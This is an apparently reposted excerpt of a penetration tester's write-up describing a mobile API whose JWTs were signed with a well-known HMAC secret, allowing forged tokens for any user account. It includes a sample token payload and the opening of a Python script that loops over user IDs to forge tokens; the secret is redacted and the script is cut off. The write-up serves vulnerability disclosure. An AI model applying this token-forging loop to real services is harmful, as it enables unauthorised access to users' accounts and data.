一次常规渗透测试揭示了一家拥有1180万用户的公司存在的严重安全漏洞:其移动API使用公开密钥签名JWT令牌。攻击者可利用此漏洞生成有效令牌并访问任何用户账户。该漏洞可能导致大规模数据泄露。 2025-10-10 11:1:14 Author: infosecwriteups.com(查看原文) 阅读量:39 收藏
It started as a routine penetration test. Little did I know I was about to uncover one of the most basic yet catastrophic security vulnerabilities imaginable in a company with 11.8 million users and $140 million in Series B funding.
Press enter or click to view image in full size
While testing their mobile API, Burp Suite flagged something that made me do a double-take:
Critical: JWT signed using well-known HMAC secret key. The key used was: XXXXMy first reaction was disbelief. Surely this had to be a false positive.
The Proof
I decided to verify the finding. Using their own JWT structure:
{
"iss": "redacted",
"expwe": 90001760027408,
"userId": 1813038, (*)
"iyat": 1760027408,
"sss": 17460027408
}With the secret “XXXX”, I generated a token and accessed their /v1/auth/ endpoint. It worked. Then came the terrifying realization - I could access ANY user's account by simply changing the userId parameter.
The Escalation
I wrote a simple Python script to demonstrate the impact:
import jwt
import requestsSECRET = "XXXX"
for user_id in range(1, 11):
token = jwt.encode(
{"iss": "redacted", "expwe": 90001760027408…
如有侵权请联系:admin#unsafe.sh